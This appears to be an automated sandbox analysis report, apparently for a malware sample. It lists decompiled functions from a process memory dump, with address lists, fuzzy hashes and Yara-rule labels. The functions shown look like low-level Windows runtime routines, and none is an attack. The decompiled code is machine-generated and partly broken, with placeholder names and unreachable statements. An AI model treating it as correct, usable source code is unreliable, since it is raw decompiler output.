0x03633e13
0x03633e16
0x03633e1e
0x03633e25
0x03633e28
0x00000000
0x00000000
0x03633e2a
0x03633e2f
0x03633e37
0x03633e37
0x00000000
0x03633e37
0x03633e31
0x00000000
0x03633e31
0x03633e20
0x03633e20
0x03633e35
0x00000000
0x03633de9
0x03633de9
0x03633de9
0x03633dee
0x03633dfd
0x03633dff
0x03633e02
0x03633e05
0x03633e05
0x00000000
0x03633df0
0x03633de7
0x0366e78f
0x0366e794
0x03633d79
0x03633d84
0x03633d89
0x03633d8e
0x00000000
0x0366e7a4
0x03633d96
0x03633d9a
0x00000000
0x03633d9a
0x00000000
0x0366e794
0x03633d6e
0x03633d73
0x00000000
0x0366e7b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c41a2cefaf37a6125fac94226cb6e84454795e51cf47430a9618c191ba937fc
Instruction ID: fa4d4af3c1f7ef9a6e055ada3014644ddc0338d48779babd8ae11483cfc70e5e
Opcode Fuzzy Hash: 6c41a2cefaf37a6125fac94226cb6e84454795e51cf47430a9618c191ba937fc
Instruction Fuzzy Hash: D431D239A01615DBC729CF2DD941A7BBBF5EF46710B29806EE846CB360EB30D841C790

Uniqueness

Uniqueness Score: -1.00%

Function 0361C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0361C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03617D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E036C8D34(_v8, _t80);
					}
					E03612280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0360FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E036C8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0360FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0363B180();
						if(_a4 != 0) {
							E03612280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0361BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0361BB2D(_t16, _t15);
						E0361B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0360FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0360FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0360FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0361c18d
0x0361c18f
0x0361c191
0x0361c19b
0x0361c1a0
0x0361c1d4
0x0361c1de
0x03662d6e
0x0361c1e4
0x0361c1e4
0x0361c1e4
0x0361c1ec
0x03662d7d
0x03662d7d
0x0361c1f3
0x0361c1ff
0x03662d88
0x03662d8d
0x03662d94
0x03662d94
0x03662d9f
0x03662da4
0x03662dab
0x03662db0
0x03662db2
0x03662db3
0x03662db4
0x03662dbc
0x03662dc3
0x03662dc3
0x0361c205
0x0361c205
0x0361c208
0x0361c20e
0x0361c211
0x0361c216
0x0361c219
0x0361c21f
0x0361c222
0x0361c22c
0x0361c234
0x0361c23a
0x0361c23f
0x0361c245
0x0361c24b
0x0361c251
0x0361c25a
0x0361c276
0x0361c27d
0x0361c27d
0x0361c25c
0x0361c25c
0x00000000
0x0361c25e
0x0361c1a4
0x0361c1aa
0x0361c1b3
0x0361c265
0x0361c26c
0x0361c26c
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: a0eb556f8ee76324389a00c3637f70a990a4d33cfce3baab4458c92eb89daeb2
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: E131287564168ABFD714EBB4C490BEEFB64BF42200F0C815EC4184F341DB386926D798

Uniqueness

Uniqueness Score: -1.00%

Function 03677016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03677016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x36ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03676B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03676B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03617D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03639AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0363B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03614620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x03677016
0x0367701e
0x0367702b
0x03677033
0x03677037
0x0367703c
0x0367703e
0x03677041
0x03677045
0x0367704a
0x03677050
0x03677055
0x0367705a
0x03677062
0x03677062
0x0367705a
0x03677064
0x03677064
0x03677067
0x03677071
0x03677096
0x0367709b
0x036770a2
0x036770a6
0x036770a7
0x036770ad
0x036770b3
0x036770b6
0x036770bb
0x036770c3
0x036770c3
0x036770c6
0x036770cd
0x036770dd
0x036770e0
0x036770e2
0x036770e2
0x036770ee
0x03677101
0x036770f0
0x036770f9
0x036770f9
0x0367710a
0x0367710e
0x03677112
0x03677117
0x03677118
0x03677118
0x036770bb
0x0367711d
0x03677123
0x03677131
0x03677131
0x03677136
0x0367713d
0x0367713e
0x0367713f
0x0367714a
0x0367714a
0x03677084
0x03677088
0x00000000
0x0367708e
0x0367708e
0x03677092
0x00000000
0x03677092

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584f4a8fa0c4e46fef08a9ec1cc562d09deb7ab67d037d695256c0f93a504a04
Instruction ID: 9abbf6f4ef5c7c447e7992ecfc0992a223e9d0b965ea6d208faede1d68c18cfd
Opcode Fuzzy Hash: 584f4a8fa0c4e46fef08a9ec1cc562d09deb7ab67d037d695256c0f93a504a04
Instruction Fuzzy Hash: 1931B1766047519BC321DF28C940A7AB7F9BF88700F484A2DF8958B790E770E914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 036A3D40, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E036A3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x36ed360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E03612280(_t34, 0x36e8a6c);
				_t64 =  *0x36e5768; // 0x77f05768
				if(_t64 != 0x36e5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0360FFB0(_t53, _t64, 0x36e8a6c);
						 *0x36eb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E03612280(_t45, 0x36e8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x36e5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0360FFB0(_t51, _t64, 0x36e8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0363B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x036a3d40
0x036a3d48
0x036a3d52
0x036a3d59
0x036a3d5d
0x036a3d61
0x036a3d63
0x036a3d67
0x036a3d69
0x036a3d72
0x036a3d76
0x036a3d7a
0x036a3d7f
0x036a3d8b
0x036a3d91
0x036a3d91
0x036a3d91
0x036a3d94
0x036a3d96
0x036a3d9d
0x036a3da1
0x036a3db0
0x036a3dba
0x036a3dbc
0x036a3dbc
0x036a3dc6
0x036a3dcb
0x036a3dcf
0x036a3dd1
0x036a3dd4
0x00000000
0x00000000
0x036a3dd9
0x036a3e0c
0x036a3e0c
0x036a3e0f
0x036a3ddb
0x036a3ddb
0x036a3de0
0x00000000
0x036a3de2
0x036a3de2
0x036a3de4
0x036a3de8
0x036a3deb
0x036a3df1
0x00000000
0x036a3df3
0x036a3df3
0x036a3df5
0x036a3df8
0x036a3dfa
0x00000000
0x036a3dfa
0x036a3df1
0x036a3de0
0x036a3e11
0x036a3e11
0x00000000
0x036a3dfe
0x036a3e04
0x036a3e06
0x00000000
0x036a3e06
0x00000000
0x036a3e04
0x036a3d91
0x036a3e15
0x036a3e1a
0x036a3e1f
0x036a3e1f
0x036a3e23
0x036a3e29
0x00000000
0x00000000
0x036a3e2e
0x00000000
0x036a3e30
0x036a3e30
0x036a3e35
0x00000000
0x036a3e37
0x036a3e3e
0x036a3e42
0x036a3e48
0x036a3e4e
0x00000000
0x036a3e4e
0x036a3e35
0x00000000
0x036a3e2e
0x036a3e5b
0x036a3e5c
0x036a3e5d
0x036a3e68
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b740b77e1dcfac3e2e1aac6ebd48bf4530bd2ef293a7c16947da8c4708421d
Instruction ID: 46f2d5efbecd2d5b957673e7726eb1f19c83e4493d0e422c7a8d5af8ef42eb05
Opcode Fuzzy Hash: 90b740b77e1dcfac3e2e1aac6ebd48bf4530bd2ef293a7c16947da8c4708421d
Instruction Fuzzy Hash: 5A318C79609702CFCB14DF18C58441ABBE5FF86604F18496EE4999B341D730DD18CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0362A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0362A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x36e7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x36e7b10 = 8;
					 *0x36e7b14 = 0x36e7b0c;
					 *0x36e7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0362A990(0x36e7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0362A840(__edx, __ecx, __ecx, _t52, 0x36e7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x36e7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x36e7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x36e7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L03614620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x36e7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0363F3E0(_t50,  *0x36e7b14, _t8 >> 3);
						_t28 =  *0x36e7b14; // 0x77f07b0c
						__eflags = _t28 - 0x36e7b0c;
						if(_t28 != 0x36e7b0c) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x36e7b14 = _t50;
						_t48 = _v12;
						 *0x36e7b10 = _t9;
						goto L6;
					}
					 *0x36e7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0362a713
0x0362a714
0x0362a717
0x0362a71d
0x0362a720
0x0362a722
0x0362a727
0x0362a74a
0x0362a754
0x0362a75e
0x0362a768
0x0362a76a
0x0362a773
0x0362a78b
0x0362a790
0x0362a792
0x0362a741
0x0362a741
0x0362a743
0x0362a749
0x0362a749
0x0362a732
0x0362a73a
0x0362a797
0x0362a79d
0x0362a7a3
0x0362a7a9
0x0362a7b6
0x0362a7bc
0x0362a7ca
0x0362a7e0
0x0362a7e2
0x0362a7e4
0x03669bf2
0x00000000
0x03669bf2
0x0362a7ed
0x0362a7f2
0x0362a800
0x0362a805
0x0362a80d
0x0362a812
0x03669c08
0x03669c08
0x0362a818
0x0362a81b
0x0362a821
0x0362a824
0x00000000
0x0362a824
0x0362a7ae
0x00000000
0x0362a7ae
0x0362a73c
0x0362a73e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822f3f956534ec994f20d5ce53ed62ff60422e403157ed02660e0e901d539409
Instruction ID: 4317d63b71cf5678e17c560109659b899285d27dc589ad93078edc812768f4a2
Opcode Fuzzy Hash: 822f3f956534ec994f20d5ce53ed62ff60422e403157ed02660e0e901d539409
Instruction Fuzzy Hash: 0331E1B5A00A11DFC711DF58E980F29BBF9FB84710F15499AE0158F348DBB0990ECB91

Uniqueness

Uniqueness Score: -1.00%

Function 035FAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E035FAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x36ed360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x36e7b9c; // 0x0
					_t53 = L03614620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0363B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0363F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03606C59(_t53, _t51, _t58) != 0) {
							_t28 = E03625E50(0x35dc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0362B230(_v32, _v28, 0x35dc2d8, 1,  &_v24);
								_t28 = E035FF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x035faa25
0x035faa29
0x035faa2d
0x035faa30
0x035faa37
0x035faa3c
0x03654458
0x03654458
0x03654472
0x03654474
0x03654476
0x035faa64
0x035faa74
0x0365447c
0x03654483
0x03654492
0x035faa52
0x035faa54
0x035faa5e
0x036544a8
0x036544ad
0x036544af
0x036544b6
0x036544b6
0x036544b9
0x036544bc
0x036544cd
0x036544d3
0x036544d6
0x036544e1
0x036544e1
0x036544e6
0x036544e8
0x036544fb
0x036544fb
0x036544e8
0x00000000
0x035faa5e
0x03654476
0x035faa42
0x035faa46
0x035faa48
0x035faa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf2081051ff70747ecae5804bf9f9ca6b9e1beba77768dd4710f29a9068937c
Instruction ID: 74469e12888b7683e931c3201e844af95389803f66ff1367e10e1ee7aac71160
Opcode Fuzzy Hash: baf2081051ff70747ecae5804bf9f9ca6b9e1beba77768dd4710f29a9068937c
Instruction Fuzzy Hash: BA31D471A00219AFCB11DF65DD81ABFB7B8FF44700F054469F905DB250EB349960CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 036261A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E036261A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03625E50(0x35d67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E036C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E035FF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x036261b3
0x036261b5
0x036261bd
0x036261c3
0x036261c7
0x036261d2
0x036261ff
0x036261ff
0x03626201
0x03626207
0x03626207
0x036261d4
0x036261d9
0x00000000
0x00000000
0x036261df
0x036261e2
0x00000000
0x00000000
0x036261e6
0x036261e8
0x036261ee
0x036261ee
0x036261f9
0x0366762f
0x03667632
0x03667635
0x03667639
0x03667640
0x0366766e
0x03667675
0x00000000
0x00000000
0x03667681
0x03667689
0x0366768d
0x03667691
0x03667695
0x03667699
0x036676af
0x036676b5
0x036676b7
0x036676b7
0x036676d7
0x036676dc
0x00000000
0x036676dc
0x036676a2
0x036676a9
0x03667651
0x03667653
0x03667653
0x03667656
0x03667656
0x00000000
0x03667656
0x03667644
0x03667646
0x03667648
0x03667648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb954ced3e7b2b8b9946413f300878944db5c4545c2c964e667fb48d7dec1b7a
Instruction ID: ae17970cbfdd40f8419b36b87bd95fe5130934613912db756c6952fc6d4bf7ff
Opcode Fuzzy Hash: eb954ced3e7b2b8b9946413f300878944db5c4545c2c964e667fb48d7dec1b7a
Instruction Fuzzy Hash: 5D3169716057118FD320CF19CA04B2AFBE4FB88B44F09496DE998DB361E7B0E804CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03634A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03634A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x36ed360 ^ _t62;
				_v8 =  *0x36ed360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03612280(_t26, 0x36e8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0360FFB0(_t41, _t51, 0x36e8608);
						L2:
						 *0x36eb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0363B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03612280(_t28, 0x36e8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0360FFB0(_t42, _t53, 0x36e8608);
							if(_t53 != 0) {
								L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0360FFB0(_t41, _t51, 0x36e8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x03634a2c
0x03634a34
0x03634a3c
0x03634a3e
0x03634a48
0x03634a4b
